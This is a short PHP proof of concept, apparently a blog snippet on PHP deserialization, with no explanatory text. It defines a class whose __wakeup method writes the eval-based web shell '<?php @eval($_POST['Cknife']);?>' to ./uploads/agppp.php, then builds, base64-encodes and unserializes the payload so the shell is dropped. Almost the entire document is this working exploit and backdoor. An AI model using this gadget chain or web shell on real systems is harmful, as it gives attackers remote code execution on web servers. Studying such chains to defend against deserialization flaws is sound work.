PHP反序列化

by agppp

<?php
    class DemoPopChain{
    private $data = '<?php @eval($_POST[\'Cknife\']);?>';
    private $filename = './uploads/agppp.php';
    public function __wakeup(){
        $this->save($this->filename);
    }
        public function save($filename){
        file_put_contents($filename, $this->data);
    }
  }


$f = new DemoPopChain();
$f = serialize($f);
$f =  base64_encode($f);

var_dump($f);
$f = base64_decode($f);
unserialize($f);
exit();
?>

http://www.tuicool.com/articles/F3iYbaZ